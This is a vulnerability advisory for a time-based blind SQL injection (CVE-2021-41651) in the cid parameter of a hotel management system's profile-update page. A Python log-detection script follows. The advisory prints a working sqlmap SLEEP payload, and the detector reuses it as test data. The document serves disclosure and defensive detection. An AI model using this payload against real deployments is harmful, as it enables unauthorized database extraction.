CVE-2021-41651 SQL Injection in hotel-mgmt-system
The hotel-mgmt-system is vulnerable to an unauthenticated, time-based blind SQL injection attack.
The cid parameter on the /process_update_profile.php page is not sanitized, so an attacker can extract sensitive data from the underlying MySQL database.
URL: /process_update_profile.php
PARAMETER: cid
Parameter: cid ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&email=me@you.com&newPassword=fasdfasdfasdfasdfasdf-
Jason Colyvas
MOBIUSBINARY
September 23rd, 2021
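
A detection check for the request pattern described above, as an added example that is not part of the original advisory or the project's code: it flags POSTs to /process_update_profile.php whose cid is not a plain integer and marks those that also responded slowly. The record fields, source addresses and the 4-second threshold are assumptions; the sample records are constructed, with the injected body taken from the sqlmap output above.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

TARGET_PATH = "/process_update_profile.php"  # endpoint named in the advisory
STRICT_INT = re.compile(r"[0-9]{1,10}")       # assumption: cid is a numeric id
SLOW_SECONDS = 4.0  # assumption: normal responses finish well under this

# POST body quoted in the advisory's sqlmap output, used as a test vector.
ADVISORY_BODY = (
    "phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)"
    "-- IKdVf&submitBtn=Update&fullName=James&email=me@you.com"
    "&newPassword=fasdfasdfasdfasdfasdf-"
)
BENIGN_BODY = "phone=123456778&cid=14&submitBtn=Update&fullName=James"

# Constructed records; the field names are assumptions about the log source.
SAMPLE_RECORDS = [
    {"src": "198.51.100.7", "path": TARGET_PATH, "body": BENIGN_BODY, "secs": 0.08},
    {"src": "203.0.113.9", "path": TARGET_PATH, "body": ADVISORY_BODY, "secs": 5.11},
    {"src": "203.0.113.9", "path": TARGET_PATH, "body": ADVISORY_BODY, "secs": 0.09},
    {"src": "198.51.100.7", "path": "/index.php", "body": "", "secs": 0.03},
]


def classify(record):
    """Return None for acceptable traffic, else a verdict string."""
    if record["path"] != TARGET_PATH:
        return None
    values = parse_qs(record["body"], keep_blank_values=True).get("cid", [])
    if len(values) == 1 and STRICT_INT.fullmatch(values[0]):
        return None
    # Missing, repeated or non-numeric cid is never valid for this form.
    # A slow response on top of that matches the time-based blind pattern.
    if record["secs"] >= SLOW_SECONDS:
        return "invalid-cid-delayed"
    return "invalid-cid"


def summarize(records):
    """Count verdicts per source address, skipping acceptable requests."""
    counts = Counter()
    for record in records:
        verdict = classify(record)
        if verdict:
            counts[(record["src"], verdict)] += 1
    return dict(counts)


if __name__ == "__main__":
    for key, n in sorted(summarize(SAMPLE_RECORDS).items()):
        print(key, n)
```

The same strict-integer test on cid also works as a server-side input check in front of the query, alongside a parameterized statement.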